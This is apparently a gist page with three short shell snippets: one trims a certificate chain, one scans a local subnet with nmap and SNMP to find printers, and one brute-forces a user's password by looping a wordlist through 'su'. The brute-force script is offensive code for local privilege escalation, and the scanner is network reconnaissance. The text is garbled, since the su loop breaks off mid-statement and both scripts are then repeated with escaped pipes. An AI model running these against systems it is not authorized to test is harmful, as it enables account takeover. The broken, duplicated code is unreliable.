Filippo filippolauria

## strip_last_cert.sh
wget -qO - 'http://example.com/chain.pem' | sed -Ez 's/(.*\n)-{5}BEGIN CERTIFICATE-{5}.*/\1/' > chain_wo_last_cert.pem

## scan4printers.sh
N="192.168.1.0/24" && \
H=$(sudo nmap -sS -sU -T5 -PE -pU:524,631,8611-8614,T:515,524,631,8611-8614,9100 -oG - --open -n $N | grep "/open" | cut -d' ' -f2 | tr '\n' ' ') && \
for p in $(sudo nmap -Pn -T5 -sU -p 161 -oG - --open -n $H | grep "/open" | cut -d' ' -f2); do \
  S=$((snmpget -v1 -Ov -cpublic -t0.5 $p .1.3.6.1.2.1.1.1.0 | sed 's/^STRING:\s\+//') 2> /dev/null); \
  if [ "$S" ]; then echo -e "$p\t: $S"; fi; \
done | tee /tmp/`date '+%Y-%m-%d'`-printers.txt

## brute_su.sh
#!/bin/bash

WORDLIST_FILENAME=''
USERNAME=''
TIMEOUT='1.5'
SLEEP='0.5'

for p in `cat $WORDLIST_FILENAME`; do
	echo -n "$USERNAME:$p => "
	if [ `(echo "$p" | timeout $TIMEOUT su -c whoami $USERNAME) 2> /dev/null` ]
	N="192.168.1.0/24" && \
	H=$(sudo nmap -sS -sU -T5 -PE -pU:524,631,8611-8614,T:515,524,631,8611-8614,9100 -oG - --open -n $N \| grep "/open" \| cut -d' ' -f2 \| tr '\n' ' ') && \
	for p in $(sudo nmap -Pn -T5 -sU -p 161 -oG - --open -n $H \| grep "/open" \| cut -d' ' -f2); do \
	S=$((snmpget -v1 -Ov -cpublic -t0.5 $p .1.3.6.1.2.1.1.1.0 \| sed 's/^STRING:\s\+//') 2> /dev/null); \
	if [ "$S" ]; then echo -e "$p\t: $S"; fi; \
	done \| tee /tmp/`date '+%Y-%m-%d'`-printers.txt
	#!/bin/bash

	WORDLIST_FILENAME=''
	USERNAME=''
	TIMEOUT='1.5'
	SLEEP='0.5'

	for p in `cat $WORDLIST_FILENAME`; do
	echo -n "$USERNAME:$p => "
	if [ `(echo "$p" \| timeout $TIMEOUT su -c whoami $USERNAME) 2> /dev/null` ]